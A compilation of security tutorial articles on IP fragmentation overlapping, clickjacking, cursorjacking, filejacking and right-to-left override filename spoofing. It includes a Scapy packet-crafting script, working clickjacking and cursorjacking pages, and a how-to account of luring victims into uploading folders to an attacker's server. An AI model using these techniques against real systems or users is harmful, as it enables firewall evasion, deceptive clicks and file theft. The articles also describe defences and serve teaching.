What happens when a fragment is lost? When TCP is used at layer 4 of the OSI model (the transport layer), the missing data is simply retransmitted.

3. IP Fragmentation Overlapping

Let’s assume that the packet filter allows only connections to port 80, but the attacker wants to connect to port 23. Although the packet filter is configured to block connections to port 23, the attacker might try to use IP fragmentation overlapping to bypass the packet filter and finally connect to this port.

The attack works as follows. The packet filter might be implemented in such a way that only the first fragment is checked against the configured rules: when a connection to port 80 is seen, the packet filter accepts this fragment and forwards it to the receiver. Moreover, the packet filter may assume that the following fragments just carry data, which is not interesting from its point of view. As a consequence, the packet filter forwards the next fragments to the receiver. Recall at this point that reassembly happens when the fragments arrive at the receiver. The next fragment (forwarded, as has been said, by the packet filter) might have been specially prepared by the attacker: a carefully chosen offset is used to overwrite the value of the destination port from the first fragment. The receiver waits for all fragments, reassembles them, and finally the connection to the port of the attacker’s choice is established.

The assumption here is that the packet filter looks only at the first fragment, which has all the information necessary to make a decision about forwarding or denying; the other fragments are assumed not to contain interesting data (from the packet filter’s point of view) and are simply forwarded.

How can we solve this problem? If the packet filter reassembled the fragments before making a decision (forward or deny), the attacker would be stopped. As we can see, this approach is about understanding the state or context of the traffic and is called stateful inspection (in contrast to the previously described packet filter, which is stateless).

4. Summary

IP fragmentation occurs when the data of the network layer is too large to be sent over the data link layer in one piece. It was presented how IP fragmentation can be used to bypass a packet filter (the IP fragmentation overlapping attack) and how stateful inspection can prevent this attack.

Source
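To illustrate the overlapping trick described in section 3, here is a rough Scapy sketch. It assumes the simplified stateless filter discussed above (one that inspects only the first fragment it sees for a datagram) and a receiving stack whose reassembly policy lets later overlapping data win; all addresses, ports and offsets are hypothetical, and real stacks resolve overlaps in different ways.

from scapy.all import IP, TCP, Raw, send

target = "192.0.2.10"   # hypothetical host behind the packet filter
ident = 0xabcd          # shared IP identification value ties the fragments together

# Fragment 1 (offset 0, MF set): a TCP header aimed at port 80, which the filter
# allows. Non-final fragments must carry a multiple of 8 bytes, hence the padding.
allowed = (IP(dst=target, id=ident, flags="MF", frag=0)
           / TCP(sport=40000, dport=80, flags="S") / Raw(b"\x00" * 4))

# Overlapping fragment (same offset 0): identical layout, but with dport=23.
# If the receiver's reassembly policy prefers the later data, the reassembled
# segment targets port 23 even though the filter only ever inspected port 80.
overlap = (IP(dst=target, id=ident, flags="MF", frag=0)
           / TCP(sport=40000, dport=23, flags="S") / Raw(b"\x00" * 4))

# Final fragment (offset 3 = byte 24, MF clear) completes the datagram.
last = IP(dst=target, id=ident, proto=6, frag=3) / Raw(b"\x00" * 8)

send([allowed, overlap, last])   # sending raw packets requires root privileges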
-
Same origin bypasses using clickjacking

Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. It is a browser security issue that affects a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, for example when clicking on a button that appears to perform another function. The term “clickjacking” was coined by Jeremiah Grossman and Robert Hansen in 2008. Clickjacking can be understood as an instance of the confused deputy problem, a term used to describe when a computer is innocently fooled into misusing its authority [Wikipedia].

The clickjacking attack is a common security flaw, wherein a transparent iframe and customized CSS fool a user into clicking on an invisible object without knowing it. The following code is an example of a status update form:

<html>
 <head><title>Status Update</title></head>
 <body>
  <form name="updatestatus" action="javascript: alert('Status updated')" method="POST">
   <input type="hidden" name="status" value="You are my hero, blah blah blah">
   <input type="hidden" name="Anticsrftoken" value="jaklgbkj4wtfgfklsafghajfnmacdnwmrauf">
   <input type="submit" name="twitter" value="Update here">
  </form>
 </body>
</html>

Let’s have a look at the code above. In this example, the user sees a button “Update here”, and once the user clicks on the button, a prompt comes up that says “Status updated”. A real page would contain a URL to which those input values are sent, so when the user clicks the submit button, the user’s status is updated. To exploit this, the attacker needs to frame the vulnerable site in a transparent iframe:

<html>
 <head>
  <style>
   iframe {
    filter:alpha(opacity=0);
    opacity:0;
    position:absolute;
    top: 250px;
    left: 40px;
    height: 300px;
    width: 250px;
   }
   img {
    position:absolute;
    top: 0px;
    left: 0px;
    height: 300px;
    width: 250px;
   }
  </style>
 </head>
 <body>
  <!-- The user sees the following image -->
  <img src="http://httpsecure.org/wp-content/uploads/2014/06/CSRF-220x170.png">
  <!-- but he effectively clicks on the following framed content -->
  <iframe src="http://httpsecure.org/uid=145496823/status.php"></iframe>
 </body>
</html>

In the code shown above there is no visible trace of the framed content: because the frame is fully transparent, the user sees only the image instead of the application’s real content. If the user clicks where the button sits, the click lands on the hidden HTML form loaded inside the iframe and its values are submitted. This is the simplest example of how a user can be fooled into performing unwanted actions.

Even if the application relies on an anti-CSRF token, this does not affect the delivery of the clickjacking attack, because the resource to be framed is loaded normally and therefore contains a valid anti-CSRF token. Note: clickjacking is a perfect example of bypassing an anti-CSRF token.

The example above demonstrates what clickjacking is and how it is exploited. If you need the attack to use dynamic information, such as mouse movement from the target, you can throw JavaScript into the code.
This enables you to get the exact x and y coordinates of the current mouse position. One aim of clickjacking is to ensure that the target’s mouse is always on top of the button, so the victim clicks wherever you want. Rich Lundeen and Brendan Coles created a BeEF command module implementing this very technique. It uses two frames, an inner and an outer iframe: the inner iframe loads the target origin you want to exploit, and the outer frame has its position updated according to the current mouse cursor position. This way, the concealed target is always wherever the mouse cursor is.

The following code uses the jQuery API to dynamically update the position of the outer frame given the current mouse coordinates:

$j("body").mousemove(function(e) {
 $j(outerObj).css('top', e.pageY);
 $j(outerObj).css('left', e.pageX);
});

The inner iframe style uses the opacity trick to render an invisible element:

filter:alpha(opacity=0);
opacity:0;

The clickjacking BeEF module with the preceding HTML as the inner iframe will send all clicks to the iframe. Because the iframe reliably follows the mouse movements, the cursor is always on top of the button, so wherever the user clicks on the page, they are clicking the status update button. When the user decides to click somewhere, the click triggers the onClick event of the button in the framed page, which, as you can see in the source of the framed page, results in an alert dialog.

Same origin bypasses using cursorjacking

This is similar to the clickjacking attack, but here the focus is on the mouse cursor. Good examples of cursorjacking were demonstrated by Eddy Bordi and refined by Marcus Niemietz. Cursorjacking deceives users by means of a custom cursor image, where the pointer is displayed with an offset: the displayed cursor is shifted to the right of the actual mouse position. Let’s consider the following page:

<html>
 <head>
  <style type="text/css">
   #c {
    cursor:url("http://localhost/basic_cursorjacking/new_cursor.png"),default;
   }
   #c input {
    cursor:url("http://localhost/basic_cursorjacking/new_cursor.png"),default;
   }
  </style>
 </head>
 <body>
  <h1>This is an example of CursorJacking. Click on the 'b' or 'd' buttons.</h1>
  <div id="c">
   <input type="button" value="a" onclick="alert('clicked on a')">
   <input type="button" value="b" onclick="alert('clicked on b')">
   <br>
   <input type="button" value="c" onclick="alert('clicked on c')">
   <input type="button" value="d" onclick="alert('clicked on d')">
  </div>
 </body>
</html>

Here the mouse cursor is replaced with a custom image containing a cursor icon shifted by a static offset to the right, so clicking on the second button actually results in clicking the first button. In this example the image background is visible; in a real-world scenario the image would have a transparent background. When the user tries to click the ‘b’ or ‘d’ buttons on the page, he actually clicks the button to their left.

A newer variant of this attack relies on completely hiding the cursor in the body of the page by adding the following style to the body element:

<body style="cursor:none">

Let’s take another example: a different cursor image is dynamically overlaid and bound to mousemove events.
The following code gives you a demo of this technique:

<html>
 <head>
  <title>Advanced cursorjacking by Kotowicz & Heiderich</title>
  <style>
   body,html {margin:0;padding:0}
  </style>
 </head>
 <body style="cursor:none;height: 1000px;">
  <img style="position: absolute;z-index:1000;" id=cursor src="cursor.png" />
  <div style="margin-left:300px;">
   <h1>Is this a good example of cursorjacking?</h1>
  </div>
  <button style="font-size: 150%;position:absolute;top:130px;left:630px;">YES</button>
  <button style="font-size: 150%;position:absolute;top:130px;left:680px;">NO</button>
  <div style="opacity:1;position:absolute;top:130px;left:30px;">
   <a href="https://twitter.com/share" class="twitter-share-button" data-via="kkotowicz" data-size="small">Tweet</a>
   <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
  </div>
  <script>
   function shake(n) {
    if (parent.moveBy) {
     for (i = 10; i > 0; i--) {
      for (j = n; j > 0; j--) {
       parent.moveBy(0,i);
       parent.moveBy(i,0);
       parent.moveBy(0,-i);
       parent.moveBy(-i,0);
      }
     }
    }
   }
   shake(5);
   var oNode = document.getElementById('cursor');
   var onmove = function (e) {
    var nMoveX = e.clientX, nMoveY = e.clientY;
    oNode.style.left = (nMoveX + 600)+"px";
    oNode.style.top = nMoveY + "px";
   };
   document.body.addEventListener('mousemove', onmove, true);
  </script>
 </body>
</html>

Note: the code above was written by Kotowicz & Heiderich.

In this example, the real mouse cursor is hidden and replaced with a custom image. An event listener is attached to the page body, listening for mousemove events: whenever the user moves the mouse, the listener moves the fake (visible) cursor accordingly, offset to the right of the real position. Clicking the YES button therefore results in clicking the Tweet button. This technique originally bypassed NoScript’s ClearClick protection.

Bypass same origin policy using filejacking

Filejacking allows the extrusion of directory content from the target’s underlying operating system to the attacker’s server through clever UI manipulation within the browser. The result is that, under certain conditions, you can retrieve files from the victim’s machine.

In order to perform this attack successfully, the target must use Chrome, because it is the only browser that supports the directory and webkitdirectory input attributes. Second, the attack relies on baiting the victim into clicking somewhere, similar to the clickjacking attack; in this scenario, the input element is hidden behind a button element. Kotowicz published this attack in a research paper in 2011 after analyzing the impact of delivering filejacking attacks to users baited with social engineering tricks.

The filejacking attack depends on the target using the operating system’s “Choose Folder” dialog box when downloading a file from the web. To perform this attack, you should attempt to trick the user into selecting a directory containing sensitive files, for instance by employing authentic-looking phishing content built around a “Download to…” button. JavaScript code then enumerates the files in the selected directory through the directory input attribute and POSTs each of the files back to your server. Working server-side and client-side code for filejacking is easy to find online.
The input element should have its opacity set to 0 so that it invisibly covers the visible button element. When the victim clicks the button, they are actually clicking the input element, assuming they need to select a download destination. Once a download destination is chosen, the onchange event of the input element is triggered and the malicious function executes. This enumerates the files contained in the selected download destination and packages their content into a FormData object, which is exfiltrated with a cross-origin POST XMLHttpRequest. The enumerated directory contents are thereby uploaded to the attacker’s server.

Note that the page delivering the attack and the server collecting the files do not need to share the same origin; this does not prevent the attack from working. Files can be extruded from the target’s operating system even through SOP-enforcing browsers such as Firefox, Chrome and Safari: in cross-origin scenarios, the browser still sends the XMLHttpRequest, even though the response cannot be read.

References

http://en.wikipedia.org/wiki/Clickjacking
https://browserhacker.com/

Source
-
In this article we will learn about one of the most overlooked spoofing mechanisms, known as right-to-left override (RTLO).

What is RTLO?

RIGHT-TO-LEFT OVERRIDE is a Unicode control character used mainly for writing and reading right-to-left scripts such as Arabic or Hebrew. Unicode reserves a special character, U+202E, that tells computers to display the text that follows it in right-to-left order. This trick is used to disguise the names of files attached to carriers such as email. For example, a file that appears in a listing as ThisIsRTLOfileexe.doc may actually be named ThisIsRTLOfile[U+202E]cod.exe, an executable: the U+202E character placed before “cod.exe” makes those trailing characters render reversed, as “exe.doc”.

Though some email applications and services that block executable files from being included in messages also block .exe programs obfuscated with this technique, many mail applications unfortunately don’t or can’t reliably scan archived and zipped documents, and malicious files manipulated in this way are indeed being spammed out within zip archives.

For example, let’s create a file named TestingRTLO[U+202E]xcod.txt. The U+202E character can be copied and pasted from the Character Map utility in Windows. To verify that the character is really present in the name, follow these steps:

Create a new text document, open its properties and note down its name.
Rename the file, inserting the copied U+202E character, and see the change in the file name.
Rename the file to TestingRTLO[U+202E]xcod.txt with the character inserted and observe the result.

File extension types that can be dangerous

The section below lists the common file types that can be used to execute unwanted code on the system:

.bat
.exe
.cmd
.com
.lnk
.pif
.scr
.vb
.vbe
.vbs
.wsh

Remediation against RTLO

Though most endpoint security solutions, such as antivirus products, detect this type of spoofing, and some IRC clients even change crafted malicious links back to their original form, many mail applications don’t or can’t reliably scan archived and zipped documents, and malicious files manipulated in this way are indeed being spammed out within zip archives. The biggest example of this is the usage of the backdoor “Etumbot”.

Some features of Windows also help carry out this type of attack, such as the fact that Windows hides file extensions for known file types by default. Malicious individuals can set any icon they want for, let’s say, a .exe file; with Windows’ default settings, a file named pic.jpg.exe using the standard image icon will look like a harmless image. Unchecking the “Hide extensions for known file types” option makes Windows show the real extension. Another good approach is to make sure that the folder where downloads are saved has its view set to ‘Content’, which ensures that files appear in their original form despite such manipulation.

Though this technique is a bit old, it is still being used in backdoors like Etumbot, malware known as Sirefef, etc.

Source
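As a small illustration, here is a Python sketch using the hypothetical file name from the example above; it shows the difference between what is stored on disk and what a renderer that honors U+202E displays.

# The right-to-left override control character.
RLO = "\u202e"

# What is actually stored on disk: a plain .txt file with RLO embedded in its name.
real_name = "TestingRTLO" + RLO + "xcod.txt"

# A renderer that honors RLO draws the characters after it right-to-left,
# so "xcod.txt" is shown reversed as "txt.docx". Simulate that reversal:
displayed = "TestingRTLO" + "xcod.txt"[::-1]

print("Real name :", ascii(real_name))  # the embedded \u202e character is visible here
print("Displayed :", displayed)         # TestingRTLOtxt.docx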